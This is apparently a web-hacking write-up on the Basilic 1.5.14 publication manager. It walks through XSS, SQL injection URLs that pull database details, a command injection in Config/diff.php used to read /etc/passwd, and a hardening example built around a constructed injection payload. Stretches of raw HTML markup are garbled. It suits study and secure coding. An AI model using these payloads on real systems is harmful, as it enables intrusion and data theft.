    Unpacking libjbig2dec0 (from .../libjbig2dec0_0.11+20120125-1_amd64.deb) ...
    Selecting previously unselected package libgs9-common.
    Unpacking libgs9-common (from .../libgs9-common_9.05~dfsg-6.3+deb7u1_all.deb) ...
    Selecting previously unselected package libgs9.
    Unpacking libgs9 (from .../libgs9_9.05~dfsg-6.3+deb7u1_amd64.deb) ...
    Selecting previously unselected package gsfonts.
    Unpacking gsfonts (from .../gsfonts_1%3a8.11+urwcyr1.0.7~pre44-4.2_all.deb) ...
    Selecting previously unselected package ghostscript.
    Unpacking ghostscript (from .../ghostscript_9.05~dfsg-6.3+deb7u1_amd64.deb) ...
    Selecting previously unselected package libgraphicsmagick3.
    Unpacking libgraphicsmagick3 (from .../libgraphicsmagick3_1.3.16-1.1_amd64.deb) ...
    Selecting previously unselected package graphicsmagick.
    Unpacking graphicsmagick (from .../graphicsmagick_1.3.16-1.1_amd64.deb) ...
    Selecting previously unselected package libglib2.0-data.
    Unpacking libglib2.0-data (from .../libglib2.0-data_2.33.12+really2.32.4-5_all.deb) ...
    Selecting previously unselected package libpaper-utils.
    Unpacking libpaper-utils (from .../libpaper-utils_1.1.24+nmu2_amd64.deb) ...
    Selecting previously unselected package shared-mime-info.
    Unpacking shared-mime-info (from .../shared-mime-info_1.0-1+b1_amd64.deb) ...
    Selecting previously unselected package graphicsmagick-imagemagick-compat.
    Unpacking graphicsmagick-imagemagick-compat (from .../graphicsmagick-imagemagick-compat_1.3.16-1.1_all.deb) ...
    Processing triggers for man-db ...
    Processing triggers for mime-support ...
    Setting up libavahi-common-data:amd64 (0.6.31-2) ...
    Setting up libavahi-common3:amd64 (0.6.31-2) ...
    Setting up libavahi-client3:amd64 (0.6.31-2) ...
    Setting up libcups2:amd64 (1.5.3-5+deb7u1) ...
    Setting up libjpeg8:amd64 (8d-1) ...
    Setting up libpng12-0:amd64 (1.2.49-1) ...
    Setting up libjbig0:amd64 (2.0-2+deb7u1) ...
    Setting up libtiff4:amd64 (3.9.6-11) ...
    Setting up libcupsimage2:amd64 (1.5.3-5+deb7u1) ...
    Setting up libffi5:amd64 (3.0.10-3) ...
    Setting up ttf-dejavu-core (2.33-3) ...
    Setting up fontconfig-config (2.9.0-7.1) ...
    Setting up libfontconfig1:amd64 (2.9.0-7.1) ...
    Setting up libglib2.0-0:amd64 (2.33.12+really2.32.4-5) ...
    No schema files found: doing nothing.
    Setting up libjasper1:amd64 (1.900.1-13) ...
    Setting up libgdk-pixbuf2.0-common (2.26.1-1) ...
    Setting up libgdk-pixbuf2.0-0:amd64 (2.26.1-1) ...
    Setting up libgomp1:amd64 (4.7.2-5) ...
    Setting up x11-common (1:7.7+3~deb7u1) ...
    [ ok ] Setting up X socket directories... /tmp/.X11-unix /tmp/.ICE-unix.
    Setting up libice6:amd64 (2:1.0.8-2) ...
    Setting up liblcms1:amd64 (1.19.dfsg-1.2) ...
    Setting up liblcms2-2:amd64 (2.2+git20110628-2.2+deb7u1) ...
    Setting up libltdl7:amd64 (2.4.2-1.1) ...
    Setting up libpaper1:amd64 (1.1.24+nmu2) ...

    Creating config file /etc/papersize with new version
    Setting up libsm6:amd64 (2:1.2.1-2) ...
    Setting up libwmf0.2-7:amd64 (0.2.8.4-10.3) ...
    Setting up poppler-data (0.4.5-10) ...
    Setting up fonts-droid (20111207+git-1) ...
    Setting up libijs-0.35 (0.35-8) ...
    Setting up libjbig2dec0 (0.11+20120125-1) ...
    Setting up libgs9-common (9.05~dfsg-6.3+deb7u1) ...
    Setting up libgs9 (9.05~dfsg-6.3+deb7u1) ...
    Setting up gsfonts (1:8.11+urwcyr1.0.7~pre44-4.2) ...
    Setting up ghostscript (9.05~dfsg-6.3+deb7u1) ...
    Setting up libgraphicsmagick3 (1.3.16-1.1) ...
    Setting up graphicsmagick (1.3.16-1.1) ...
    Setting up libglib2.0-data (2.33.12+really2.32.4-5) ...
    Setting up libpaper-utils (1.1.24+nmu2) ...
    Setting up
shared-mime-info (1.0-1+b1) .../span/span span class="code-line"span class="go"Setting up graphicsmagick-imagemagick-compat (1.3.16-1.1) .../span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spanspan class="nb"cd/span ../../span span class="code-line"span class="gp"[email protected]:/var# /spanchown -R www-data:www-data www//span span class="code-line"/code/pre/div /td/tr/table pOne last look at the codecheckConfig.php/code script and everything, other than the IP and lab name, is correct (I'm sure we can carry on without those 2 things)./p h2Getting To Know The App/h2 pFirstly I'd like to say that this application is riddled with vulnerabilities, after using the application for a short while I found an a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank"XSS/a:/p pimg src="/assets/images/web-hacking/basilic-xss.png" width="750" height="500"/p pAnd an a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank"SQLi/a in the same field of the same page!:/p pimg src="/assets/images/web-hacking/basilic-sqli.png" width="750" height="500"/p pThe full URL for the above SQLi is:/p pcodehttp://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%201,%202,%20%28select%20version%28%29%29,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%20%28select%20database%28%29%29,%2016,%2017,%20%28select%[email protected]@datadir%29,%2019,%2020,%2021,%2022,%2023,%20%28select%20system_user%28%29%29,%20%28select%20user%28%29%29;%20--%20amp;title=baramp;year=-1amp;display=listamp;x=0amp;y=0/code/p pI found this SQLi using this URL:/p pcodehttp://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20sleep%2815%29;%20--%20amp;title=baramp;year=-1amp;display=listamp;x=0amp;y=0/code/p pBut we are 
here to find a command injection.

Now that we have it installed, it's time to get to know the application. We know there is a command injection, we know it's written in PHP and we have the source code, so let's search through the source code for [`system`](http://www.php.net/manual/en/function.system.php):

```
 1  root@dev:/var# cd www/basilic-1.5.14/
 2  root@dev:/var/www/basilic-1.5.14# grep -r system *
 3  CHANGELOG: Minor bug fixes. Easier update of an existing Basilic system.
 4  checkConfig.php: This file is part of the Basilic system
 5  checkConfig.php: system('echo $PATH');
 6  checkConfig.php: system("which \"convert\"");
 7  checkConfig.php:$message.="Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\n";
 8  checkConfig.php: echo "An e-mail has been sent to Basilic system administrator (<code>/tmp/basilic-log.txt</code>). Check that you received it.<br/>\n";
 9  Config/install.html: This file is part of the Basilic system
10  Config/install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
11  Config/diff.php:system("diff ../$_GET[old]/$_GET[file] $_GET[new]/$_GET[file] | sed s%\"<\"%\"\&lt;\"%g | sed s%\">\"%\"\&gt;\"%g");
12  Config/tables.txt:# This file is part of the Basilic system
13  Config/checkConfig.php: This file is part of the Basilic system
14  Config/checkConfig.php: system('echo $PATH');
15  Config/checkConfig.php: system("which \"@@[email protected]@\"");
16  Config/checkConfig.php:$message.="Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\n";
17  Config/checkConfig.php: echo "An e-mail has been sent to Basilic system administrator (<code>@@[email protected]@</code>). Check that you received it.<br/>\n";
18  Config/tables.txt.new:# This file is part of the Basilic system
19  configure:# This file is part of the Basilic system
20  configure:# All these paths are expressed with respect to web server file system.
21  Import/bibtex2table:# This file is part of the Basilic system
22  Import/pyxdkbibtex.py:# This file is part of the Basilic system
23  index.html: This file is part of the Basilic system
24  index.html: <li>Simple semi-automatic system installation</li>
25  install.html: This file is part of the Basilic system
26  install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
27  Intranet/updatePubliDocs.php: @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
28  Intranet/install.html: This file is part of the Basilic system
29  Intranet/install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
30  Intranet/cnrs.html:system.
31  Intranet/basilic.html: <li>Simple semi-automatic system installation</li>
32  LICENCE:operating system on which the executable runs, unless that component
33  LICENCE:integrity of the free software distribution system, which is
34  LICENCE:through that system in reliance on consistent application of that
35  LICENCE:system; it is up to the author/donor to decide if he or she is willing
36  LICENCE:to distribute software through any other system and a licensee cannot
37  Public/updatePubliDocs.php: @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
38  Sources/CSS/backoffice.css:This file is part of the Basilic system
39  Sources/CSS/publi.css:This file is part of the Basilic system
40  Sources/CSS/header.css:This file is part of the Basilic system
41  Sources/CSS/listpubli.css:This file is part of the Basilic system
42  Sources/CSS/basilic.css:This file is part of the Basilic system
43  Sources/Public/search.php:This file is part of the Basilic system
44  Sources/Public/index.php:This file is part of the Basilic system
45  Sources/Public/updatePubliDocs.php:This file is part of the Basilic system
46  Sources/Public/updatePubliDocs.php: @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
47  Sources/Public/setLanguage.php:This file is part of the Basilic system
48  Sources/Public/publiUtils.php:This file is part of the Basilic system
49  Sources/Public/getLanguage.php:This file is part of the Basilic system
50  Sources/Public/header.php:This file is part of the Basilic system
51  Sources/Public/footer.php:This file is part of the Basilic system
52  Sources/Public/utils.php:This file is part of the Basilic system
53  Sources/Public/publi.php:This file is part of the Basilic system
54  Sources/Intranet/updatePubliDocs.php:This file is part of the Basilic system
55  Sources/Intranet/updatePubliDocs.php: @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
56  Sources/Intranet/intro.html:This file is part of the Basilic system
57  Sources/Intranet/commonMenu.html:This file is part of the Basilic system
58  Sources/Intranet/cnrs.html:This file is part of the Basilic system
59  Sources/Intranet/cnrs.html:system.
60  Sources/Intranet/Publications/publiAction.php:This file is part of the Basilic system
61  Sources/Intranet/Publications/index.html:This file is part of the Basilic system
62  Sources/Intranet/Publications/publi.php:This file is part of the Basilic system
63  Sources/Intranet/Publications/updatePublis.php:This file is part of the Basilic system
64  Sources/Intranet/Publications/menuPubli.php:This file is part of the Basilic system
65  Sources/Intranet/basilic.html:This file is part of the Basilic system
66  Sources/Intranet/basilic.html: <li>Simple semi-automatic system installation</li>
67  Sources/Intranet/index.html:This file is part of the Basilic system
68  Sources/Intranet/utils.php:This file is part of the Basilic system
69  Sources/Intranet/Authors/authorAction.php:This file is part of the Basilic system
70  Sources/Intranet/Authors/menuAuthor.php:This file is part of the Basilic system
71  Sources/Intranet/Authors/index.html:This file is part of the Basilic system
72  Sources/Intranet/Authors/author.php:This file is part of the Basilic system
73  Binary file Sources/Intranet/Images/import.jpg matches
74  Binary file Sources/Intranet/Images/export.jpg matches
75  Sources/Intranet/usersguide.html:This file is part of the Basilic system
76  usersguide.html: This file is part of the Basilic system
```

Two things stick out here. First, line 11 is clearly a command injection: `Config/diff.php` interpolates `$_GET[old]`, `$_GET[new]` and `$_GET[file]` straight into the string handed to `system()`, with no quoting or escaping, so a request parameter containing a shell metacharacter such as `;` ends the `diff` command and whatever follows it runs as the web server user. Because `system()` also writes the command's standard output into the response, the result lands on the page:

![Command injection in Config/diff.php](/assets/images/web-hacking/basilic-first-cmdi.png)

Here I am just running `cat /etc/passwd`, and you can see the output on the page.

As it turns out, this is the actual vulnerability the challenge required. Regardless, I was unhappy with this and carried on looking for the other command injection that I thought was there.
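To make the two patterns concrete, here is an added example written for this page; it is not Basilic's code and not from the original post. It reproduces the shape of the `Config/diff.php` line and of the `@system("rm $publiPath/$thumbDir/$src.jpg")` call from the grep output above, beside hardened versions, and runs offline: the `*Vulnerable` functions only return the command string they would have handed to `system()`, the attacker input and the paths are constructed for the demonstration, and the function names (`diffCommandVulnerable`, `safeRelativePath`, `removeThumbHardened` and the rest) are mine.

```php
<?php
// Added example for this write-up, not code from Basilic. It mirrors the two
// shell-building patterns seen in the grep output: Config/diff.php, which drops
// $_GET values straight into system(), and the @system("rm ...") call, whose
// path is assembled from application variables. Nothing is executed: every
// *Vulnerable function returns the command it would have run, and all inputs
// below are constructed for the demonstration.
declare(strict_types=1);

// 1. The Config/diff.php pattern, reproduced. Any shell metacharacter in
//    old, new or file is interpreted by /bin/sh when system() runs the string.
function diffCommandVulnerable(array $get): string
{
    return "diff ../{$get['old']}/{$get['file']} {$get['new']}/{$get['file']}";
}

// Allow only a relative path made of safe characters and refuse ".." segments,
// so a value can only name a file under the directory we intend to diff.
function safeRelativePath(string $value): string
{
    if ($value === ''
        || !preg_match('#^[A-Za-z0-9._/-]+$#', $value)
        || preg_match('#(^|/)\.\.(/|$)#', $value)) {
        throw new InvalidArgumentException("rejected path component: $value");
    }
    return $value;
}

// Hardened diff: validate, then quote each argument with escapeshellarg(),
// which single-quotes it so the shell never reads it as syntax.
function diffCommandHardened(array $get): string
{
    $old = '../' . safeRelativePath($get['old']) . '/' . safeRelativePath($get['file']);
    $new = safeRelativePath($get['new']) . '/' . safeRelativePath($get['file']);
    return 'diff ' . escapeshellarg($old) . ' ' . escapeshellarg($new);
}

// 2. The @system("rm ...") pattern, reproduced: a path pasted into a command.
function rmCommandVulnerable(string $publiPath, string $thumbDir, string $src): string
{
    return "rm $publiPath/$thumbDir/$src.jpg";
}

// Hardened removal: no shell at all. unlink() takes a path, not a command
// line, so metacharacters in $src are just characters. The realpath() check
// keeps the target inside the thumbnail directory even if $src contains "../".
function removeThumbHardened(string $publiPath, string $thumbDir, string $src): bool
{
    $base   = realpath("$publiPath/$thumbDir");
    $target = realpath("$publiPath/$thumbDir/$src.jpg");
    if ($base === false || $target === false || strpos($target, $base . '/') !== 0) {
        return false;   // directory or file missing, or the path escaped the directory
    }
    return unlink($target);
}

// Constructed attacker input: ";" ends the diff, "#" comments out the rest of
// the line (in the real file, the sed pipeline), so the injected command's
// output goes straight back through system() into the page.
function demo(): array
{
    $evil = ['old' => 'x', 'new' => 'y', 'file' => 'f;cat /etc/passwd;#'];
    $out  = ['diff_vulnerable' => diffCommandVulnerable($evil)];
    try {
        $out['diff_hardened'] = diffCommandHardened($evil);
    } catch (InvalidArgumentException $e) {
        $out['diff_hardened'] = 'rejected: ' . $e->getMessage();
    }
    $benign = ['old' => 'basilic-1.5.13', 'new' => 'basilic-1.5.14', 'file' => 'Public/index.php'];
    $out['diff_hardened_benign'] = diffCommandHardened($benign);

    // Constructed path; the ".thumbs" directory name is the one the grep for
    // $thumbDir shows. A nonexistent base makes removeThumbHardened() refuse
    // without touching the filesystem.
    $pubs = '/var/www/basilic-1.5.14/pubs/2014/paper';
    $out['rm_vulnerable'] = rmCommandVulnerable($pubs, '.thumbs', 'x;id;#');
    $out['rm_hardened']   = removeThumbHardened($pubs, '.thumbs', 'x;id;#');
    return $out;
}

print_r(demo());
```

Run it with `php example.php`. For the constructed payload, `diffCommandVulnerable` returns a string in which `;cat /etc/passwd;#` terminates the `diff`, runs `cat`, and comments out everything after it; handed to `system()`, that would print `/etc/passwd` into the response, which is the effect the screenshot above shows. `diffCommandHardened` rejects the same input before any quoting happens and, for a benign request, returns two single-quoted arguments. The real fix for the `rm` call is the one `removeThumbHardened` shows: there is no reason to involve a shell to delete a file.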
Second, lines 27, 37, 46 and 55 all contain this call:

`@system("rm $publiPath/$thumbDir/$src.jpg", $retVal);`

Three variables are pasted into this `system` call, so any of `$publiPath`, `$thumbDir` or `$src` could make it vulnerable to command injection (the leading `@` only silences PHP warnings; it does nothing to the shell). Looking through one of the files that contains the call to find out whether we can control any of those values:

     1  root@dev:/var/www/basilic-1.5.14# grep '$publiPath' Sources/Intranet/updatePubliDocs.php
     2    $publiPath = "@@[email protected]@/$pubPath/$msgPath";
     3    if (!is_dir($publiPath))
     4      mkdir($publiPath, 0777);
     5    if (!is_dir($publiPath))
     6      error("Error : directory $publiPath could not be created.");
     7    $file="$publiPath/index.php";
     8    if (!is_dir("$publiPath/$thumbDir"))
     9      mkdir("$publiPath/$thumbDir") or error("Unable to create $publiPath/$thumbDir directory");
    10    $thumbDirOk = (is_dir("$publiPath/$thumbDir")) && (is_writable("$publiPath/$thumbDir"));
    11    $dir = dir($publiPath);
    12    if ($file != "." && $file != ".." && is_file("$publiPath/$file"))
    13      $entry["size"] = filesize("$publiPath/$file");
    14    $imgSize = getimagesize("$publiPath/$file");
    15    if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
    16      exec("MAGICK_HOME=".getenv("MAGICK_HOME")."; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbName", $output, $returnVar);
    17    if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
    18      if (!copy("@@[email protected]@/@@[email protected]@/defaultThumb.jpg", "$publiPath/$thumbDir/$thumbName"))
    19    if (is_file("$publiPath/$thumbDir/$thumbName"))
    20      $imgSize = getimagesize("$publiPath/$thumbDir/$thumbName");
    21      sendMessage("Unrecognized document format for file $publiPath/$file");
    22    if (!is_file("$publiPath/$thumbDir/$src.jpg"))
    23      @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
    24  root@dev:/var/www/basilic-1.5.14# grep '$pubPath' Sources/Intranet/updatePubliDocs.php
    25    $pubPath = "@@[email protected]@";
    26    $publiPath = "@@[email protected]@/$pubPath/$msgPath";
    27    $msg = "<a href='/$pubPath/$msgPath'>$row[bibTex]</a> &nbsp; ";
    28    $yearPath = "@@[email protected]@/$pubPath/$row[year]";
    29  root@dev:/var/www/basilic-1.5.14# grep '$msgPath' Sources/Intranet/updatePubliDocs.php
    30    $msgPath = "$row[year]/$row[bibTex]";
    31    $publiPath = "@@[email protected]@/$pubPath/$msgPath";
    32    $msg = "<a href='/$pubPath/$msgPath'>$row[bibTex]</a> &nbsp; ";
    33      error("Publication directory $msgPath does not exist.");
    34      error("Unable to create /$msgPath/index.php");
    35      sendMessage("Thumbnail directory $msgPath/$thumbDir is not writeable");
    36      echo " $msg : Creating $msgPath/$thumbDir/$thumbName<br />\n";
    37      echo "Unable to create thumbnail for $msgPath/$file. Administrator has been warned";
    38      sendMessage("Unable to create thumbnail for $msgPath/$file error=$returnVar");
    39      // sendMessage("Thumbnail up to date for ".$msgPath.$file);
    40      echo "Unable to create thumbnail for $msgPath/$file. Administrator has been warned";
    41      sendMessage("Unable to determine image size for $msgPath/$file");
    42      echo "Thumbnail will soon be created for $msgPath/$file.<br/>\n";
    43      sendMessage("Thumbnail must be created for $msgPath/$file");
    44      sendMessage("Unable to copy default movie thumb for $msgPath/$file");
    45      sendMessage("Unable to retrieve thumbnail size for $msgPath/$file");
    46      echo "Unrecognized document format : $msgPath/$file<br/>\n";
    47      sendMessage("Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn't exist !");
    48      sendMessage("Unable to remove $msgPath/$thumbDir/$src.jpg");
    49  root@dev:/var/www/basilic-1.5.14# grep '$thumbDir' Sources/Intranet/updatePubliDocs.php
    50    $thumbDir=".thumbs";
    51    if (!is_dir("$publiPath/$thumbDir"))
    52      mkdir("$publiPath/$thumbDir") or error("Unable to create $publiPath/$thumbDir directory");
    53    $thumbDirOk = (is_dir("$publiPath/$thumbDir")) && (is_writable(
class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"quot;/spanspan class="o"))/spanspan class="p";/span/span span class="code-line"span class="go" if (!$thumbDirOk)/span/span span class="code-line"span class="go" sendMessage(quot;Thumbnail directory $msgPath/$thumbDir is not writeablequot;);/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" echo quot; $msg : Creating $msgPath/$thumbDir/$thumbNamelt;br /gt;\nquot;;/span/span span class="code-line"span class="go" exec(quot;MAGICK_HOME=quot;.getenv(quot;MAGICK_HOMEquot;).quot;; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbNamequot;, $output, $returnVar);/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" if (!copy(quot;@@[email protected]@/@@[email protected]@/defaultThumb.jpgquot;, quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="go" if (is_file(quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="gp" $/spanspan class="nv"imgSize/span span class="o"=/span getimagesizespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"//spanspan class="nv"$thumbName/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if (!is_file(quot;$publiPath/$thumbDir/$src.jpgquot;))/span/span span class="code-line"span class="go" sendMessage(quot;Cannot remove 
$msgPath/$thumbDir/$src.jpg : it doesn#39;t exist !quot;);/span/span span class="code-line"span class="go" @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to remove $msgPath/$thumbDir/$src.jpgquot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$src#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"src/span span class="o"=/span ereg_replacespan class="o"(/spanspan class="s2"quot;.*source=#39;([^#39;]*).*quot;/span, span class="s2"quot;\\1quot;/span, span class="nv"$docInDataBase/spanspan class="o"[/spanspan class="s2"quot;/spanspan class="nv"$docId/spanspan class="s2"quot;/spanspan class="o"])/spanspan class="p";/span/span span class="code-line"span class="go" echo quot; $msg : Removing $src from databaselt;br /gt;\nquot;;/span/span span class="code-line"span class="go" if (!is_file(quot;$publiPath/$thumbDir/$src.jpgquot;))/span/span span class="code-line"span class="go" sendMessage(quot;Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn#39;t exist !quot;);/span/span span class="code-line"span class="go" @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to remove $msgPath/$thumbDir/$src.jpgquot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$row#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="go"function sourceString($row)/span/span span class="code-line"span class="go" return quot;type=#39;quot;.$row[quot;typequot;].quot;#39;, source=#39;quot;.$row[quot;sourcequot;].quot;#39;quot;;/span/span span class="code-line"span class="go"function sizeString($row)/span/span span class="code-line"span class="go" return 
quot;size=#39;quot;.$row[quot;sizequot;].quot;#39;, sizeX=#39;quot;.$row[quot;sizeXquot;].quot;#39;, sizeY=#39;quot;.$row[quot;sizeYquot;].quot;#39;quot;;/span/span span class="code-line"span class="go" while ($result amp;amp; $row=mysql_fetch_array($result))/span/span span class="code-line"span class="gp" $/spandocInDataBasespan class="o"[/spanspan class="nv"$row/spanspan class="o"[/spanspan class="s2"quot;idquot;/spanspan class="o"]]=/spansourceStringspan class="o"(/spanspan class="nv"$row/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spandocSizespan class="o"[/spanspan class="nv"$row/spanspan class="o"[/spanspan class="s2"quot;idquot;/spanspan class="o"]]=/spansizeStringspan class="o"(/spanspan class="nv"$row/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"row/spanspan class="o"=/spanmysql_fetch_arrayspan class="o"(/spanspan class="nv"$result/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msgPath/span span class="o"=/span span class="s2"quot;/spanspan class="nv"$row/spanspan class="s2"[year]//spanspan class="nv"$row/spanspan class="s2"[bibTex]quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msg/span span class="o"=/span span class="s2"quot;lt;a href=#39;//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"#39;gt;/spanspan class="nv"$row/spanspan class="s2"[bibTex]lt;/agt; amp;nbsp; quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"yearPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$row/spanspan class="s2"[year]quot;/spanspan class="p";/span/span span class="code-line"span class="go" echo quot;Creating year directory $row[year]lt;br/gt;\nquot;;/span/span span 
class="code-line"span class="go" echo quot;Creating index.php in $row[year]lt;br/gt;\nquot;;/span/span span class="code-line"span class="go" fwrite($f, quot;lt;quot;.quot;?php if (empty(\$_GET[\quot;year\quot;])) \$year=$row[year]; include(\quot;../index.php\quot;); ?quot;.quot;gt;quot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$result#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"result/span span class="o"=/span sqlQueryspan class="o"(/spanspan class="s2"quot;SELECT * FROM docs, publidocs WHERE publidocs.idPubli=/spanspan class="nv"$publiId/spanspan class="s2" AND publidocs.idDoc=docs.idquot;/spanspan class="o")/spanspan class="p";/span /span span class="code-line"span class="go" while ($result amp;amp; $row=mysql_fetch_array($result))/span/span span class="code-line"span class="gp" $/spanspan class="nv"result/span span class="o"=/span sqlQueryspan class="o"(/spanspan class="s2"quot;SELECT year, bibTex FROM publis WHERE id=/spanspan class="nv"$publiId/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if ($result)/span/span span class="code-line"span class="gp" $/spanspan class="nv"row/spanspan class="o"=/spanmysql_fetch_arrayspan class="o"(/spanspan class="nv"$result/spanspan class="o")/spanspan class="p";/span/span span class="code-line"/code/pre/div /td/tr/table pHere I am searching through the file codeSources/Intranet/updatePubliDocs.php/code for each section on that string. First I search for code$publiPath/code on line 1 and its clear from line 2 that code$publiPath/code is made from the string [email protected]@[email protected]@/$pubPath/$msgPath/code./p pWe can't manipulate [email protected]@[email protected]@/code, so next I search for code$pubPath/code on line 24. 
Line 25 makes it clear that we are unable to manipulate this either, so next I search for `$msgPath` on line 29. It looks like we might be able to manipulate this, but let's check the other parts first.

On line 49 I search for `$thumbDir`, but line 50 shows we can't manipulate this, and on line 67 I search for `$src`, but line 68 shows this isn't useful.

So back to `$msgPath`: the code that sets it, `$msgPath = "$row[year]/$row[bibTex]";` on line 30, shows that the variable `$row` is used. Searching for `$row`, on line 74, shows that it is set using a MySQL query on line 82. This query is built and put into the variable `$result` before it is run.

Lastly I search for `$result` on line 89, which shows that the actual query being run is `SELECT year, bibTex FROM publis WHERE id=$publiId` on line 92. So it is made of 2 fields, `year` and `bibTex`, in the `publis` table.

Looking at the schema, `year` is a 4 digit year field, which isn't useful to us, but `bibTex` is a 20 character field. We can use this, although we will be limited to 20 characters at a time:

```
[email protected]:/var/www/basilic-1.5.14# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 102
Server version: 5.5.37-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> \u basilic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show create table publis;
+--------+----------------------------------------------------------------------+
| Table  | Create Table                                                         |
+--------+----------------------------------------------------------------------+
| publis | CREATE TABLE `publis` (
  `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
  `bibTex` varchar(20) NOT NULL DEFAULT '',
  `entry` enum('Article','InProceedings','InBook','Book','PhdThesis','MastersThesis','TechReport','Misc','Booklet','InCollection','Manual','Proceedings','Unpublished') NOT NULL DEFAULT 'Article',
  `address` varchar(255) DEFAULT NULL,
  `booktitle` varchar(255) DEFAULT NULL,
  `chapter` varchar(30) DEFAULT NULL,
  `edition` varchar(50) DEFAULT NULL,
  `editor` varchar(255) DEFAULT NULL,
  `howpublished` varchar(255) DEFAULT NULL,
  `institution` varchar(255) DEFAULT NULL,
  `journal` varchar(255) DEFAULT NULL,
  `keywords` varchar(255) DEFAULT NULL,
  `month` varchar(30) DEFAULT NULL,
  `note` varchar(255) DEFAULT NULL,
  `number` varchar(10) DEFAULT NULL,
  `optkey` varchar(255) DEFAULT NULL,
  `organization` varchar(255) DEFAULT NULL,
  `pages` varchar(15) DEFAULT NULL,
  `publisher` varchar(255) DEFAULT NULL,
  `school` varchar(255) DEFAULT NULL,
  `series` varchar(255) DEFAULT NULL,
  `title` varchar(255) NOT NULL DEFAULT '',
  `type` varchar(255) DEFAULT NULL,
  `volume` varchar(20) DEFAULT NULL,
  `year` year(4) NOT NULL DEFAULT '0000',
  PRIMARY KEY (`id`),
  UNIQUE KEY `bibTex` (`bibTex`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 |
+--------+----------------------------------------------------------------------+
1 row in set (0.00 sec)
```

Time to figure out how we insert data into this table.

You can add a publication on the publications page (`http://dev/basilic-1.5.14/Intranet/Publications/`). It first asks you what type of publication you want to create; I pick anything here.
Before you can add a publication you will need to create an author.

Also, before you can create a publication, you need to create a `Publications` directory in the web root and give the web user permission to write to it:

```
[email protected]:/var/www/basilic-1.5.14# mkdir ../Publications
